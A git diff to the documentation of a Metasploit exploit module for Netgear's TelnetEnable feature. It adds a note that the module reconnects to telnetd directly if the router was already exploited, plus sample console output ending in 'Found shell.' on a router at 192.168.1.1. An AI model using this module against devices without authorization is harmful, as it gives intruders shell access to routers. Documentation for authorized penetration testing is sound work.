diff --git a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md index d468247faf..00f0347042 100644 --- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md +++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md @@ -113,3 +113,15 @@ uname -a Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown # ``` + +If you've already exploited TelnetEnable, the exploit will attempt to +connect to `telnetd` directly. This saves us from sending the magic +packet again. + +``` +msf5 exploit(linux/telnet/netgear_telnetenable) > run + +[+] 192.168.1.1:23 - Detected telnetd on TCP +[*] 192.168.1.1:23 - Connecting to telnetd +[*] Found shell. +```